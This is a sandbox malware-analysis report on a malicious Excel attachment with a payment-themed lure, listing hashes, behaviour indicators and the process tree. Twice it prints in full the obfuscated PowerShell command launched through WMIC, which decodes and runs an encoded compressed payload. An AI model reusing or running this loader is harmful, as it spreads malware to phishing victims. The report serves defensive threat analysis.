analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

FT_BONIFICO_2019_08_84_87.xls.zip

Full analysis: https://app.any.run/tasks/e8561deb-cefb-40e1-b2cc-dd751948a49c
Verdict: Malicious activity
Analysis date: September 19, 2019, 08:22:25
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
maldoc-5
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

A14CA8BAA98311F5B3F2EE9904EFB2CF

SHA1:

638361DADD2BDE0666CB3E84369659A2118932B6

SHA256:

8E149B3D51BE6D6C0203AD0C1131EF36DAF97E4EF4B169A1D1BD90A70741AC1F

SSDEEP:

768:F3LMhQIELzY/sp2IDXdwv8dKxk/Keezxy+tglFsIiIKzOfh:yWIEA3IuvORedy+tglFZrIOfh

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 2068)
  • SUSPICIOUS

    • Uses WMIC.EXE to create a new process

      • EXCEL.EXE (PID: 2068)
    • Executed via WMI

      • POwerShelL.exe (PID: 3360)
    • PowerShell script executed

      • POwerShelL.exe (PID: 3360)
    • Creates files in the user directory

      • POwerShelL.exe (PID: 3360)
  • INFO

    • Manual execution by user

      • EXCEL.EXE (PID: 2068)
      • rundll32.exe (PID: 2712)
      • EXCEL.EXE (PID: 3520)
    • Creates files in the user directory

      • EXCEL.EXE (PID: 2068)
      • EXCEL.EXE (PID: 3520)
    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 2068)
      • EXCEL.EXE (PID: 3520)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 788
ZipBitFlag: 0x0001
ZipCompression: Deflated
ZipModifyDate: 2019:09:19 10:21:21
ZipCRC: 0x997a3482
ZipCompressedSize: 30214
ZipUncompressedSize: 60418
ZipFileName: FT_BONIFICO_2019_08_84_87.xls
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
43
Monitored processes
7
Malicious processes
1
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winrar.exe no specs excel.exe no specs rundll32.exe no specs mctadmin.exe no specs wmic.exe no specs powershell.exe no specs excel.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3540"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\FT_BONIFICO_2019_08_84_87.xls.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
2068"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
2712"C:\Windows\system32\rundll32.exe" shell32.dll,Control_RunDLL intl.cpl,,/p:"location"C:\Windows\system32\rundll32.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2280C:\Windows\system32\mctadmin.exeC:\Windows\system32\mctadmin.exerundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
MCTAdmin
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2724wmIC 'PRocess' CalL "CREate" "POwerShelL -NOnIntERACtIvE -eXecuti BYPASs -WIn 00000000000000000000001 -NOPrOfi IeX ("\"sal Eii iEx; sal iiE nEw-OBjeCt;iEx(iiE SySTEM.Io.cOmpreSsiOn.DEfLateStReAm([iO.meMORYsTrEAm] [CONVeRT]::frOmBASE64sTrING('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')"\" + ([CHAR]44).ToStrIng() + "\" [iO.CompreSsiON.cOMpresSIoNModE]::DEcOMpreSS )| % {iiE SysTEM.Io.STrEamrEadEr( `$_"\" + ([CHAR]44).ToStrIng() + "\"[tExT.EnCODing]::ascii )}).ReadToENd();;ping -n 1 0"\")"C:\Windows\System32\Wbem\wmIC.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
WMI Commandline Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3360POwerShelL -NOnIntERACtIvE -eXecuti BYPASs -WIn 00000000000000000000001 -NOPrOfi IeX ("\"sal Eii iEx; sal iiE nEw-OBjeCt;iEx(iiE SySTEM.Io.cOmpreSsiOn.DEfLateStReAm([iO.meMORYsTrEAm] [CONVeRT]::frOmBASE64sTrING('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')"\" + ([CHAR]44).ToStrIng() + "\" [iO.CompreSsiON.cOMpresSIoNModE]::DEcOMpreSS )| % {iiE SysTEM.Io.STrEamrEadEr( `$_"\" + ([CHAR]44).ToStrIng() + "\"[tExT.EnCODing]::ascii )}).ReadToENd();;ping -n 1 0"\")C:\Windows\System32\WindowsPowerShell\v1.0\POwerShelL.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3520"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
Total events
2 573
Read events
2 278
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
5
Text files
4
Unknown types
4

Dropped files

PID
Process
Filename
Type
3540WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRb3540.36977\FT_BONIFICO_2019_08_84_87.xls
MD5:
SHA256:
2068EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRCB34.tmp.cvr
MD5:
SHA256:
2068EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DFBA5FCF8442777062.TMP
MD5:
SHA256:
2068EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DF83333FB7BF259714.TMP
MD5:
SHA256:
2068EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DFC8EB46E80C98B723.TMP
MD5:
SHA256:
2068EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DF434BE89A5C3762A5.TMP
MD5:
SHA256:
2068EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DF2EE18CAF6D6D2CBA.TMP
MD5:
SHA256:
2068EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DF94CBF22C280ED097.TMP
MD5:
SHA256:
2068EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DF14759501EDE827A8.TMP
MD5:
SHA256:
2068EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DFA7CD20C36775DC65.TMP
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

No data

Threats

No threats detected
No debug info